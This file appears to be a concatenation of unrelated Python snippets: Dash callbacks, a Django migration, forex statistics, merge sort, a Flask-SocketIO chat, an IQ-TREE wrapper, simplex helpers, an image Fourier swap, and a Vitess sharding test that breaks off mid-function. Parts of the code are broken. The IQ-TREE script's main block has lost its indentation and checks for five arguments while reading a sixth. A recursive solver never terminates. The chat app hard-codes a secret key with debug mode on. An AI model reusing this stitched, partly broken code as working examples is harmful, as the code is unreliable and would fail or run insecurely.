# NOTE: dataset-extraction header residue ("text stringlengths ... |---|") removed;
# the content below is a concatenation of independent Python source snippets.
from app import app
import dash_core_components as dcc
import dash_html_components as html
from dash.dependencies import Input, Output
import charts
import helpers
# Generate Plotly content
# Static page layout for the network-analysis section. The two empty Divs
# ("corr_network" and "ego_network") are placeholders that the callbacks
# registered below fill in at runtime.
_corr_controls = html.Div([
    dcc.Dropdown(
        id="corr_dir",
        options=[{"label": d, "value": d} for d in ("Positive", "Negative")],
        value="",
    )
])
_ego_controls = html.Div(
    [
        dcc.Input(
            id="ego_network_count",
            type="text",
            value="0",
            placeholder="Top-N Ego-networks",
        ),
    ],
    style={"textAlign": "center"},
)
content = html.Section(
    children=[
        html.Div([
            html.H2("Network Analysis at a glance...", className="align-center"),
            _corr_controls,
            html.Div(id="corr_network"),
            _ego_controls,
            html.Div(id="ego_network"),
        ])
    ]
)
@app.callback(
    Output("ego_network", "children"),
    [
        Input("ego_network_count", "value")
    ],
)
def update_ego_network(ego_network_count):
    """Render one dcc.Graph per top-N ego-network.

    The triggering dcc.Input is type="text", so the callback can receive
    "" (initial render) or arbitrary non-numeric text; both previously
    raised ValueError in int() and broke the callback. Fall back to 0.
    """
    try:
        count = int(ego_network_count)
    except (TypeError, ValueError):
        count = 0
    ego_networks = charts.generate_ego_network(count)
    return [
        dcc.Graph(
            id=f'ego_network_{i}',
            figure=figure,
            config={"displayModeBar": False},
        )
        for i, figure in enumerate(ego_networks)
    ]
@app.callback(
    Output("corr_network", "children"),
    [
        Input("corr_dir", "value")
    ],
)
def update_corr_network(corr_dir):
    """Rebuild the correlation-network graph for the selected direction.

    An empty dropdown value (initial render) falls back to "Positive" so
    the chart generator is never handed an unknown key.
    """
    direction = "Positive" if corr_dir == "" else corr_dir
    graph = dcc.Graph(
        id='corr_network_1',
        figure=charts.generate_correlation_network(direction),
        config={"displayModeBar": False},
    )
    return [graph]
# Generated by Django 3.0.6 on 2020-06-07 16:27
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration.

    Adds a Song.duration char field (default '0') and relaxes
    SpotifyUser.songs to allow an empty M2M relation (blank=True).
    Generated code — do not hand-edit the operations.
    """

    dependencies = [
        ('musicRun', '0006_spotifyuser'),
    ]

    operations = [
        # duration stored as text (e.g. "mm:ss"), max 8 chars — TODO confirm format
        migrations.AddField(
            model_name='song',
            name='duration',
            field=models.CharField(default='0', max_length=8),
        ),
        # blank=True lets forms/admin accept a user with no songs
        migrations.AlterField(
            model_name='spotifyuser',
            name='songs',
            field=models.ManyToManyField(blank=True, to='musicRun.Song'),
        ),
    ]
|
import sys
from src.HistData.File.FileParser import FileParser
from src.HistData.Service.TimeRangeChecker import hour_range_stadistics, range_percentage
# Time is in Eastern Standard Time (EST) WITHOUT Day Light Savings adjustments
def main():
    """Print bullish/bearish/equal day statistics for every one-hour window
    of the 2019 EUR/USD M1 data set.

    Times are Eastern Standard Time (EST) WITHOUT daylight-savings
    adjustments; the last window ends at 23:59:00 so it does not overlap
    with the next day's first window.
    """
    filename = 'data/HistData/2019_EUR_USD_M1.csv'
    parser = FileParser(filename)
    # Renamed from `range`, which shadowed the builtin.
    hour_windows = [('000000', '010000'), ('010000', '020000'), ('020000', '030000'), ('030000', '040000'),
                    ('040000', '050000'), ('050000', '060000'), ('060000', '070000'), ('070000', '080000'),
                    ('080000', '090000'), ('090000', '100000'), ('100000', '110000'), ('110000', '120000'),
                    ('120000', '130000'), ('130000', '140000'), ('140000', '150000'), ('150000', '160000'),
                    ('160000', '170000'), ('170000', '180000'), ('180000', '190000'), ('190000', '200000'),
                    ('200000', '210000'), ('210000', '220000'), ('220000', '230000'), ('230000', '235900')]
    for start, end in hour_windows:
        # NOTE(review): candles are re-extracted for every window — confirm
        # extract_candles_data() returns a fresh list each call.
        result = hour_range_stadistics(parser.extract_candles_data(), start, end)
        total = result['total']
        print(start + ' to ' + end + ':')
        print('bullish days: ' + str(result['bullish']) + ' - ' + range_percentage(result['bullish'], total) + ' %')
        print('bearish days: ' + str(result['bearish']) + ' - ' + range_percentage(result['bearish'], total) + ' %')
        print('equal days: ' + str(result['equal']) + ' - ' + range_percentage(result['equal'], total) + ' %')
    # Success path must exit 0 (the original exited 1, signalling failure
    # to the shell), and print-statement syntax is replaced by print().
    sys.exit(0)
# Run the report only when executed directly, not when imported.
if __name__ == '__main__':
    main()
|
import queue
# Move table: each row is the per-counter increment of one allowed move
# (used only by the disabled BFS below) — TODO confirm intended semantics.
masks = [[2, 1, 0, 2],
         [1, 1, 1, 1],
         [0, 0, 2, 1],
         [0, 3, 0, 0],
         [1, 0, 0, 1]]
# Number of test cases; read from stdin at import time.
cases = int(input())
def r(a, b, c, d):
    """Recursive search over the four counters, memoised in the global `mem`.

    Bug fix: the original indexed `mem` with a list (`mem[[a, b, c, d]]`),
    which raises TypeError because lists are unhashable — a tuple key is
    used instead.

    NOTE(review): this function looks unfinished — nothing is ever stored
    in `mem`, there is no base case, and only the first recursive call is
    bounds-guarded, so most call paths recurse without terminating. The
    author's alternative BFS is commented out below.
    """
    key = (a, b, c, d)
    if key in mem:
        return mem[key]
    else:
        if a - 2 > -1 and b - 1 > -1 and d - 2 > -1:
            r(a - 2, b - 1, c, d - 2)
        r(a - 1, b - 1, c - 1, d - 1)
        r(a, b, c - 2, d - 1)
        r(a, b - 3, c, d - 0)
        r(a - 1, b, c, d - 1)
for c in range(cases):
    # Target counter values for this case, read from one stdin line.
    pos = list(map(int, input().split()))
    # Memo table shared with r(); reset for every case.
    mem = {}
    # NOTE(review): the BFS solver below is disabled (left as a string
    # literal), so each case is read but never actually solved.
    '''
    queue_sheit = queue.Queue()
    queue_sheit.put([0, 0, 0, 0])
    while not queue_sheit.empty():
        meh = queue_sheit.get()[:]
        if meh == pos:
            print("Meh")
        for m in masks:
            meh2 = meh[:]
            for i in range(4):
                meh2[i] += m[i]
                if meh2[i] > 30:
                    print(meh2)
                    break
            else:
                queue_sheit.put(meh2)
    '''
|
import random
def set_the_value():  # Read and validate one value from stdin
    """Read one integer from stdin, re-prompting until the input parses.

    Typing 'exit' terminates the whole program. Invalid input prints a
    (Ukrainian) error message and loops. The original had an unreachable
    `break` after `return int(value)`, removed here.
    """
    while True:
        try:
            value = input()
            if value == 'exit':
                print('Програма завершила роботу')
                exit()
            else:
                return int(value)
        except ValueError:
            print("НЕ вірні дані! Спробуй ще разочок")
def set_the_number():  # Read the array size
    """Prompt for the number of array elements; re-prompt until positive.

    The original wrapped the while loop in an `if` with the identical
    condition — the `while` alone is sufficient.
    """
    print("Введіть кількість елементів у масиві:")
    numbers = set_the_value()
    while numbers <= 0:
        print("Масив не може бути меншим або дорівнювати нулю!!! Спробуй ще:")
        numbers = set_the_value()
    return numbers
def create_an_array():  # Build an array from keyboard input
    """Read `set_the_number()` integers from stdin and return them as a list."""
    size = set_the_number()
    values = []
    for index in range(size):
        print("Введіь елемент масиву " + str(index + 1) + ":")
        values.append(set_the_value())
    return values
def create_an_random_array():  # Build a random array
    """Build an array of random integers drawn from the user range [a, b].

    Bug fix: the original re-validated `a == b` INSIDE the fill loop, so
    the iteration that hit the re-prompt appended nothing and the returned
    array was shorter than requested. The bounds are now validated once,
    before filling.
    """
    numbers = set_the_number()
    arr = []
    print("Введіь елемент a:")
    a = set_the_value()
    print("Введіь елемент b:")
    b = set_the_value()
    while a == b:
        print("Діапазон не може бути рівний!")
        print("Введіь елемент a:")
        a = set_the_value()
        print("Введіь елемент b:")
        b = set_the_value()
    # randint needs low <= high regardless of input order.
    low, high = (a, b) if a < b else (b, a)
    for _ in range(numbers):
        arr.append(random.randint(low, high))
    return arr
def merge_two_elements(a, b):  # Merge two sorted lists
    """Merge two sorted lists into one sorted list.

    Every comparison/copy step bumps the module-level `count` so the main
    program can report how many operations the sort performed.
    """
    global count
    merged = []
    i = j = 0
    while i < len(a) and j < len(b):
        # Take the smaller head element; ties go to `b` (stable enough for ints).
        if a[i] < b[j]:
            merged.append(a[i])
            i += 1
        else:
            merged.append(b[j])
            j += 1
        count += 1
    # At most one of the tails is non-empty; append it wholesale.
    if i < len(a):
        merged += a[i:]
        count += 1
    if j < len(b):
        merged += b[j:]
        count += 1
    return merged
def merge_sort(arr):  # Sort the array
    """Recursive merge sort; counts operations in the global `count`.

    Bug fix: the base case is now `len(arr) <= 1` — the original
    `len(arr) == 1` recursed forever on an empty list.
    """
    global count
    if len(arr) <= 1:
        count += 1
        return arr
    middle = len(arr) // 2
    left = merge_sort(arr[:middle])
    right = merge_sort(arr[middle:])
    count += 1
    return merge_two_elements(left, right)
def method_selection():  # Choose how the array is created
    """Show the (Ukrainian) menu, read the user's choice, and return the
    sorted array: 'a' = type the values, 'b' = generate random values,
    'exit' = terminate the program. Re-prompts on any other input.
    """
    print("Доброго дня, шановний користувач!\n"
          "Якщо ви бажаєте ввести масив довжини N з клавіатури, то введіть 'a'\n"
          "Якщо ви бажаєте згенерувати довільний масив довжини N зі значень, які знаходяться в діапазоні [a, b], де a,b вводяться з клавіатури, то введіть 'b'\n"
          "Якщо ви бажаєте завершити роботу програми введіть 'exit'")
    while True:
        sposib = input("Ви вибираєте: ")
        if sposib == 'exit':
            print('Програма завершила роботу')
            exit()
        elif sposib == 'a':
            return merge_sort(create_an_array())
        elif sposib == 'b':
            return merge_sort(create_an_random_array())
        else:
            print("Упс, помилка! Такого варіанту у нас нема. Спробуй ще раз.")
# Main driver: sort one array per iteration and report how many
# comparison/merge operations the sort performed.
while True:
    count = 0
    sorted_array = method_selection()
    print("Відсортований масив: " + str(sorted_array))
    print("Кількість операцій, виконаних при цьому: " + str(count))
from flask import Flask, render_template
from flask_socketio import SocketIO, send, emit
app = Flask(__name__)
# NOTE(review): hard-coded SECRET_KEY and DEBUG=True are acceptable for a
# local experiment but must not ship to production.
app.config['SECRET_KEY'] = 'ekisde'
app.config['DEBUG'] = True
# Wrap the Flask app with SocketIO to get websocket support.
socketio = SocketIO(app)
@app.route('/')
def index():
    """Serve the chat page."""
    page = render_template('index.html')
    return page
@socketio.on('message')
def chat(msg):
    """Log an incoming chat message and broadcast it to all clients."""
    print('USUARIO: ' + msg)
    send(msg, broadcast=True)
# Run through the SocketIO server (not app.run) so websockets work.
if __name__ == '__main__':
    socketio.run(app)
from safedelete.managers import SafeDeleteManager
class IipManager(SafeDeleteManager):
    """Model manager for IIP objects.

    Inherits SafeDeleteManager's soft-delete filtering unchanged; exists
    so model-specific query methods have a home later.
    """
    pass
import os
import sys
import subprocess
sys.path.insert(0, 'scripts')
import experiments as exp
def find_string_between(input_str, marker1, marker2):
    """Return the substring of input_str between the first occurrence of
    marker1 and the next occurrence of marker2 after it.

    NOTE: if a marker is absent, str.find returns -1 and the slice is
    silently wrong — callers are expected to pass text that contains both.
    """
    begin = input_str.find(marker1) + len(marker1)
    stop = input_str.find(marker2, begin)
    return input_str[begin:stop]
def run(alignment, tree, trees, model, iqtree_prefix):
    """Run IQ-TREE tree-topology tests (AU test etc.) and return the best
    log-likelihood reported in its output.

    Parameters mirror the IQ-TREE CLI: alignment file (-s), fixed tree
    (-te), candidate tree set (-z), substitution model (-m) and output
    prefix (-pre). Raises subprocess.CalledProcessError on IQ-TREE failure
    and ValueError if the score line is missing/unparseable.
    """
    cmd = [
        exp.iqtree_exec,
        "-s", alignment,
        "-m", model,
        "-pre", iqtree_prefix,
        "-redo",
        "-z", trees,
        "-te", tree,
        "-n", "0",          # no tree search iterations; evaluate only
        "-zb", "10000",     # bootstrap replicates for the topology tests
        "-zw",
        "-au",              # approximately-unbiased test
        "-nt", "40",        # thread count
    ]
    print(" ".join(cmd))
    # Bug fix: on Python 3, check_output returns bytes unless an encoding
    # is given (the original had `encoding='utf-8'` commented out), so the
    # string search below crashed. Decode defensively for py2/py3.
    logs = subprocess.check_output(cmd)
    if isinstance(logs, bytes):
        logs = logs.decode("utf-8")
    ll = find_string_between(logs, "BEST SCORE FOUND : ", "\n")
    return float(ll)
def run_tests(alignment, tree, trees, model, iqtree_prefix):
    """Run the IQ-TREE topology tests and return the best log-likelihood.

    The original silently discarded run()'s return value; returning it is
    backward compatible (callers ignoring the result are unaffected).
    """
    return run(alignment, tree, trees, model, iqtree_prefix)
if __name__ == "__main__":
if (len(sys.argv) < 5):
print("syntax: python " + os.path.basename(__file__) + " alignment model tree trees iqtree_prefix]")
sys.exit(1)
alignment = sys.argv[1]
tree = sys.argv[2]
trees = sys.argv[3]
model = sys.argv[4]
iqtree_prefix = sys.argv[5]
run_tests(alignment, tree, trees, model, iqtree_prefix)
|
def removeDuplicates(nums):
    """Remove duplicates from a sorted list in place (LeetCode 26 style).

    Compacts the unique values into the front of `nums`, prints the
    deduplicated prefix, and returns it. Works for empty and one-element
    lists. Modernised from Python 2 (`print` statement) and now returns
    the result instead of only printing it (backward compatible).
    """
    write_count = 0
    for i in range(0, len(nums) - 1):
        j = i + 1
        # Only a change in value advances the write cursor; the write
        # index always trails the read index, so no needed value is lost.
        if nums[i] != nums[j]:
            nums[write_count + 1] = nums[j]
            write_count += 1
    result = nums[0:write_count + 1]
    print(result)
    return result
# Demo run: prints the deduplicated prefix of a sorted list.
nums=[1,1,1,2,2,3,4,4,5,5,5,6,6,6,6]
removeDuplicates(nums)
|
def variance(array):
    """Return the population variance of the element lengths of `array`,
    rounded to 4 decimal places.

    Bug fixes: on Python 3, `map()` returns an iterator, so the original
    `len(nums)` raised TypeError (and summing would have exhausted it);
    the lengths are materialised into a list. An empty input now returns
    0.0 instead of raising ZeroDivisionError.
    """
    lengths = [len(a) for a in array]
    if not lengths:
        return 0.0
    length = float(len(lengths))
    average = sum(lengths) / length
    return round(sum((average - x) ** 2 for x in lengths) / length, 4)
|
from texttable import Texttable
import numpy as np
def inserir_matriz(matriz, restricao, pos_linha, lista_pos):
    """Write one constraint into row `pos_linha` of the simplex tableau.

    `restricao` holds the coefficients followed by the right-hand side;
    `lista_pos` gives the tableau column for each coefficient. The row is
    written as floats, in place, and the (mutated) matrix is returned.
    """
    num_cols = len(matriz[0])
    row = [0] * num_cols
    # Scatter each coefficient into the column recorded for it.
    for idx, col in enumerate(lista_pos):
        row[col] = restricao[idx]
    # The constraint's last entry is its right-hand side -> last column.
    row[num_cols - 1] = restricao[len(restricao) - 1]
    for col in range(num_cols):
        matriz[pos_linha][col] = float(row[col])
    return matriz
def funcao_objetiva(objetiva):
    """Parse an objective-function string like "3x1 5x2" into a tableau row.

    Returns (row, variable_count): row is [1, -c1, -c2, ...] (coefficients
    negated for the maximisation tableau, with the leading 1 for the Z
    column); variable_count is the number of terms plus 2.
    """
    tokens = objetiva.split(" ")
    tam = len(tokens)
    coefs = [None] * tam
    # A lone '-' token negates the variable token that follows it.
    for i in range(tam):
        if tokens[i] == '-':
            tokens[i + 1] = '-' + tokens[i + 1]
    # Tokens of at least 3 chars (e.g. '3x1') are coefficient*variable terms.
    for i in range(tam):
        if len(tokens[i]) >= 3:
            coefs[i] = tokens[i]
    # Strip the trailing variable name ('x1') and negate for the tableau.
    for i in range(tam):
        if coefs[i] is not None:
            coefs[i] = float(coefs[i][:len(coefs[i]) - 2]) * (-1)
    coefs = [c for c in coefs if c is not None]
    qtd_variaveis = len(coefs) + 2
    return [1] + coefs, qtd_variaveis
def calc_pos(string):
    """Return the variable index encoded in the LAST character of a term
    token, e.g. '3x1' -> 1.

    NOTE(review): only the final character is read, so variable indices
    above 9 (e.g. 'x12') are truncated — confirm the solver never needs
    more than 9 variables.
    """
    return int(string[len(string) - 1:])
def calc_restricao(restr):
    """Parse one constraint string such as "2x1 4x2 10".

    Returns (coefficients, positions): the coefficient strings (with the
    variable suffix stripped) plus the right-hand side as the last entry,
    and the tableau column index for each variable term.
    """
    tokens = restr.split(" ")
    tam = len(tokens)
    coefs = [None] * tam
    positions = [None] * tam
    # A lone '-' token negates the variable token that follows it.
    for i in range(tam):
        if tokens[i] == '-':
            tokens[i + 1] = '-' + tokens[i + 1]
    for i in range(tam):
        token = tokens[i]
        if i == tam - 1:
            # Last token is the right-hand side; keep it verbatim.
            coefs[i] = token
            break
        if len(token) >= 3:
            positions[i] = calc_pos(token)  # column for this variable
            coefs[i] = token
    # Keep only the numeric part of each coefficient token (drop 'xN').
    for i in range(tam):
        if i == (tam - 1):
            break
        if coefs[i] is not None:
            coefs[i] = coefs[i][:len(coefs[i]) - 2]
    coefs = [x for x in coefs if x is not None]
    positions = [x for x in positions if x is not None]
    return coefs, positions
def coluna_entra(matriz):
    """Return the entering (pivot) column: the index of the most negative
    entry in row 0 of the tableau.

    Bug fix: when row 0 has no negative entry, the original never assigned
    `coluna` and raised UnboundLocalError; it now defaults to 0. Callers
    should still gate on verifica_matriz() before pivoting.
    """
    num_cols = len(matriz[0])
    coluna = 0
    menor = 0
    for i in range(num_cols):
        if matriz[0][i] < menor:
            menor = matriz[0][i]
            coluna = i
    return coluna
def nova_linha_pivo(matriz, qtdLinhas, coluna):
    """Pick the pivot row by the minimum-ratio test and normalise it.

    For each row below row 0 with a positive entry in `coluna`, computes
    RHS / entry and keeps the row with the smallest non-negative ratio.
    Returns (normalised pivot row, pivot row index).

    NOTE(review): if no row has a positive entry in `coluna`, `linha` is
    never assigned and this raises UnboundLocalError — confirm callers
    only pivot on valid columns (unbounded LPs would hit this).
    """
    nova_linha = [None] * len(matriz[0])
    qtdColunas = len(matriz[0])
    menor = 999999  # sentinel: larger than any expected ratio
    for i in range(1, qtdLinhas):
        if(matriz[i][coluna] > 0):
            pivo_tmp = float(matriz[i][qtdColunas - 1] / matriz[i][coluna])
        else:
            continue  # non-positive entries cannot be pivots
        if ((pivo_tmp >= 0) and (pivo_tmp < menor)):
            menor = pivo_tmp
            linha = i
    pivo = matriz[linha][coluna]
    # Normalise the chosen row so the pivot element becomes 1.
    for i in range(qtdColunas):
        nova_linha[i] = matriz[linha][i] / pivo
    return nova_linha, linha
def calc_nova_linha(matriz, linha_pivo, coluna, pos, linha_p):
    """Eliminate column `coluna` from row `pos` using the normalised pivot
    row (Gaussian elimination step of the simplex method).

    Returns the updated row; the pivot row itself (`pos == linha_p`) is
    simply replaced by the normalised pivot row.
    """
    if linha_p == pos:
        return linha_pivo
    num_cols = len(matriz[0])
    fator = -matriz[pos][coluna]
    return [(linha_pivo[c] * fator) + matriz[pos][c] for c in range(num_cols)]
def verifica_matriz(matriz):
    """Return True while row 0 still contains a negative coefficient,
    i.e. while another simplex iteration is required."""
    return any(valor < 0 for valor in matriz[0])
def imprime_matriz(matriz, cabecalho, qtdColunas):
    """Pretty-print the simplex tableau with Texttable.

    A zero row is prepended as a spacer, every column is rendered as text,
    and the header row is appended last (so it appears under the data, as
    in the original layout). Returns None.
    """
    spacer_row = [0] * qtdColunas
    col_types = ['t'] * qtdColunas  # render every column as text
    dados = np.insert(matriz, 0, spacer_row, axis=0)
    tabela = Texttable()
    tabela.set_cols_dtype(col_types)
    tabela.add_rows(dados)
    tabela.add_rows([cabecalho])
    print("")
    print(tabela.draw())
    return None
|
import cv2 as cv
import numpy as np
from popupMessage import popupmsg
def fSwap():
    """Swap the Fourier magnitude and phase between city.jpg and face.jpg
    and display both reconstructions, then show a summary popup.
    """
    def _grayscale_fft(path):
        # Load, convert to grayscale, and take the 2-D DFT.
        img = cv.cvtColor(cv.imread(path), cv.COLOR_BGR2GRAY)
        return np.fft.fft2(img)

    def _combine(magnitude_ft, phase_ft):
        # Rebuild an image from one spectrum's magnitude and the other's phase.
        spectrum = np.multiply(np.abs(magnitude_ft), np.exp(1j * np.angle(phase_ft)))
        return np.real(np.fft.ifft2(spectrum)).astype(np.uint8)

    city_ft = _grayscale_fft("city.jpg")
    face_ft = _grayscale_fft("face.jpg")
    # Image 1: face magnitude + city phase; Image 2: the reverse.
    for title, image in (("Image 1", _combine(face_ft, city_ft)),
                         ("Image 2", _combine(city_ft, face_ft))):
        cv.imshow(title, image)
        cv.waitKey(0)
        cv.destroyAllWindows()
    popupmsg("The images appeared to be very distorted from the original version. However, the main details in each photo are still recognizable. Along the edges of the images, there are areas of sharp change and distortion.")
|
#!/usr/bin/env python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This test simulates the first time a database has to be split.
- we start with a keyspace with a single shard and a single table
- we add and populate the sharding key
- we set the sharding key in the topology
- we clone into 2 instances
- we enable filtered replication
- we move all serving types
- we remove the source tablets
- we remove the original shard
"""
import logging
import unittest
from vtdb import keyrange_constants
import base_sharding
import environment
import tablet
import utils
# initial shard, covers everything
shard_master = tablet.Tablet()
shard_replica = tablet.Tablet()
shard_rdonly1 = tablet.Tablet()
# split shards
# range '' - 80
shard_0_master = tablet.Tablet()
shard_0_replica = tablet.Tablet()
shard_0_rdonly1 = tablet.Tablet()
# range 80 - ''
shard_1_master = tablet.Tablet()
shard_1_replica = tablet.Tablet()
shard_1_rdonly1 = tablet.Tablet()
# every tablet the test uses, in the order setup/teardown iterate them
all_tablets = [shard_master, shard_replica, shard_rdonly1,
               shard_0_master, shard_0_replica, shard_0_rdonly1,
               shard_1_master, shard_1_replica, shard_1_rdonly1]
def setUpModule():
  """Start the topo server and one MySQL instance per tablet."""
  try:
    environment.topo_server().setup()
    setup_procs = [t.init_mysql() for t in all_tablets]
    utils.wait_procs(setup_procs)
  except:
    # Any partial setup must be torn down before the error propagates,
    # otherwise stray mysqld/topo processes leak into later test runs.
    tearDownModule()
    raise
def tearDownModule():
  """Stop all MySQL instances, the topo server, and remove scratch state.

  Honors --skip-teardown (useful for post-mortem debugging).
  """
  utils.required_teardown()
  if utils.options.skip_teardown:
    return
  teardown_procs = [t.teardown_mysql() for t in all_tablets]
  utils.wait_procs(teardown_procs, raise_on_error=False)
  environment.topo_server().teardown()
  utils.kill_sub_processes()
  utils.remove_tmp_files()
  for t in all_tablets:
    t.remove_tree()
class TestInitialSharding(unittest.TestCase, base_sharding.BaseShardingTest):
  """End-to-end test of the first split of a keyspace: shard 0 -> -80/80-.

  Follows the module docstring's scenario: create an unsharded keyspace,
  backfill a sharding key, clone into two destination shards with
  vtworker, verify filtered replication, migrate all serving types, and
  finally delete the source shard.
  """

  # create_schema will create the same schema on the keyspace
  def _create_schema(self):
    """Create the initial (unsharded) test table."""
    # Note that the primary key columns are not defined first on purpose to test
    # that a reordered column list is correctly used everywhere in vtworker.
    create_table_template = '''create table %s(
msg varchar(64),
id bigint not null,
parent_id bigint not null,
primary key (parent_id, id),
index by_msg (msg)
) Engine=InnoDB'''
    utils.run_vtctl(['ApplySchema',
                     '-sql=' + create_table_template % ('resharding1'),
                     'test_keyspace'],
                    auto_log=True)

  def _add_sharding_key_to_schema(self):
    """Add the (initially nullable) sharding-key column."""
    if base_sharding.keyspace_id_type == keyrange_constants.KIT_BYTES:
      t = 'varbinary(64)'
    else:
      t = 'bigint(20) unsigned'
    sql = 'alter table %s add custom_ksid_col ' + t
    utils.run_vtctl(['ApplySchema',
                     '-sql=' + sql % ('resharding1'),
                     'test_keyspace'],
                    auto_log=True)

  def _mark_sharding_key_not_null(self):
    """Tighten the sharding-key column to NOT NULL after backfill."""
    if base_sharding.keyspace_id_type == keyrange_constants.KIT_BYTES:
      t = 'varbinary(64)'
    else:
      t = 'bigint(20) unsigned'
    sql = 'alter table %s modify custom_ksid_col ' + t + ' not null'
    utils.run_vtctl(['ApplySchema',
                     '-sql=' + sql % ('resharding1'),
                     'test_keyspace'],
                    auto_log=True)

  # _insert_startup_value inserts a value in the MySQL database before it
  # is sharded
  def _insert_startup_value(self, tablet_obj, table, mid, msg):
    tablet_obj.mquery('vt_test_keyspace', [
        'begin',
        'insert into %s(parent_id, id, msg) values(%d, %d, "%s")' %
        (table, base_sharding.fixed_parent_id, mid, msg),
        'commit'
        ], write=True)

  def _insert_startup_values(self):
    """Seed three rows whose keyspace ids will land on both sides of 80."""
    self._insert_startup_value(shard_master, 'resharding1', 1, 'msg1')
    self._insert_startup_value(shard_master, 'resharding1', 2, 'msg2')
    self._insert_startup_value(shard_master, 'resharding1', 3, 'msg3')

  def _backfill_keyspace_id(self, tablet_obj):
    """Populate the sharding key for the startup rows directly in MySQL."""
    tablet_obj.mquery('vt_test_keyspace', [
        'begin',
        'update resharding1 set custom_ksid_col=0x1000000000000000 where id=1',
        'update resharding1 set custom_ksid_col=0x9000000000000000 where id=2',
        'update resharding1 set custom_ksid_col=0xD000000000000000 where id=3',
        'commit'
        ], write=True)

  def _check_startup_values(self):
    """Verify each startup row exists only in the shard owning its ksid."""
    # check first value is in the left shard
    for t in [shard_0_master, shard_0_replica, shard_0_rdonly1]:
      self._check_value(t, 'resharding1', 1, 'msg1', 0x1000000000000000)
    for t in [shard_1_master, shard_1_replica, shard_1_rdonly1]:
      self._check_value(t, 'resharding1', 1, 'msg1',
                        0x1000000000000000, should_be_here=False)
    # check second value is in the right shard
    for t in [shard_0_master, shard_0_replica, shard_0_rdonly1]:
      self._check_value(t, 'resharding1', 2, 'msg2', 0x9000000000000000,
                        should_be_here=False)
    for t in [shard_1_master, shard_1_replica, shard_1_rdonly1]:
      self._check_value(t, 'resharding1', 2, 'msg2', 0x9000000000000000)
    # check third value is in the right shard too
    for t in [shard_0_master, shard_0_replica, shard_0_rdonly1]:
      self._check_value(t, 'resharding1', 3, 'msg3', 0xD000000000000000,
                        should_be_here=False)
    for t in [shard_1_master, shard_1_replica, shard_1_rdonly1]:
      self._check_value(t, 'resharding1', 3, 'msg3', 0xD000000000000000)

  def _insert_lots(self, count, base=0):
    """Insert `count` rows into each of the two destination key ranges."""
    for i in xrange(count):
      self._insert_value(shard_master, 'resharding1', 10000 + base + i,
                         'msg-range1-%d' % i, 0xA000000000000000 + base + i)
      self._insert_value(shard_master, 'resharding1', 20000 + base + i,
                         'msg-range2-%d' % i, 0xE000000000000000 + base + i)

  # _check_lots returns how many of the values we have, in percents.
  def _check_lots(self, count, base=0):
    found = 0
    for i in xrange(count):
      if self._is_value_present_and_correct(shard_1_replica, 'resharding1',
                                            10000 + base + i, 'msg-range1-%d' %
                                            i, 0xA000000000000000 + base + i):
        found += 1
      if self._is_value_present_and_correct(shard_1_replica, 'resharding1',
                                            20000 + base + i, 'msg-range2-%d' %
                                            i, 0xE000000000000000 + base + i):
        found += 1
    percent = found * 100 / count / 2
    logging.debug('I have %d%% of the data', percent)
    return percent

  def _check_lots_timeout(self, count, threshold, timeout, base=0):
    """Poll _check_lots until at least `threshold` percent arrived."""
    while True:
      value = self._check_lots(count, base=base)
      if value >= threshold:
        return value
      timeout = utils.wait_step('enough data went through', timeout)

  # _check_lots_not_present makes sure no data is in the wrong shard
  def _check_lots_not_present(self, count, base=0):
    for i in xrange(count):
      self._check_value(shard_0_replica, 'resharding1', 10000 + base + i,
                        'msg-range1-%d' % i, 0xA000000000000000 + base + i,
                        should_be_here=False)
      self._check_value(shard_0_replica, 'resharding1', 20000 + base + i,
                        'msg-range2-%d' % i, 0xE000000000000000 + base + i,
                        should_be_here=False)

  def test_resharding(self):
    """Full initial-sharding workflow, in strict chronological order."""
    # create the keyspace with just one shard
    shard_master.init_tablet(
        'replica',
        keyspace='test_keyspace',
        shard='0',
        tablet_index=0)
    shard_replica.init_tablet(
        'replica',
        keyspace='test_keyspace',
        shard='0',
        tablet_index=1)
    shard_rdonly1.init_tablet(
        'rdonly',
        keyspace='test_keyspace',
        shard='0',
        tablet_index=2)
    for t in [shard_master, shard_replica, shard_rdonly1]:
      t.create_db('vt_test_keyspace')
    # replica is not started, InitShardMaster should timeout
    shard_master.start_vttablet(wait_for_state=None,
                                binlog_use_v3_resharding_mode=False)
    shard_rdonly1.start_vttablet(wait_for_state=None,
                                 binlog_use_v3_resharding_mode=False)
    for t in [shard_master, shard_rdonly1]:
      t.wait_for_vttablet_state('NOT_SERVING')
    # reparent to make the tablets work - expect fail
    # because replica tablet is not up
    _, stderr = utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/0',
                                 shard_master.tablet_alias], auto_log=True, expect_fail=True)
    self.assertIn('Tablet test_nj-0000062345 ResetReplication failed', stderr)
    # start replica
    shard_replica.start_vttablet(wait_for_state=None,
                                 binlog_use_v3_resharding_mode=False)
    shard_replica.wait_for_vttablet_state('NOT_SERVING')
    # reparent to make the tablets work
    utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/0',
                     shard_master.tablet_alias], auto_log=True)
    utils.wait_for_tablet_type(shard_replica.tablet_alias, 'replica')
    utils.wait_for_tablet_type(shard_rdonly1.tablet_alias, 'rdonly')
    for t in [shard_master, shard_replica, shard_rdonly1]:
      t.wait_for_vttablet_state('SERVING')
    # create the tables and add startup values
    self._create_schema()
    self._insert_startup_values()
    # reload schema on all tablets so we can query them
    for t in [shard_master, shard_replica, shard_rdonly1]:
      utils.run_vtctl(['ReloadSchema', t.tablet_alias], auto_log=True)
    # We must start vtgate after tablets are up, or else wait until 1min refresh
    # (that is the tablet_refresh_interval parameter for discovery gateway)
    # we want cache_ttl at zero so we re-read the topology for every test query.
    utils.VtGate().start(cache_ttl='0', tablets=[
        shard_master, shard_replica, shard_rdonly1])
    utils.vtgate.wait_for_endpoints('test_keyspace.0.master', 1)
    utils.vtgate.wait_for_endpoints('test_keyspace.0.replica', 1)
    utils.vtgate.wait_for_endpoints('test_keyspace.0.rdonly', 1)
    # check the Map Reduce API works correctly, should use ExecuteShards,
    # as we're not sharded yet.
    # we have 3 values in the database, asking for 4 splits will get us
    # a single query.
    sql = 'select id, msg from resharding1'
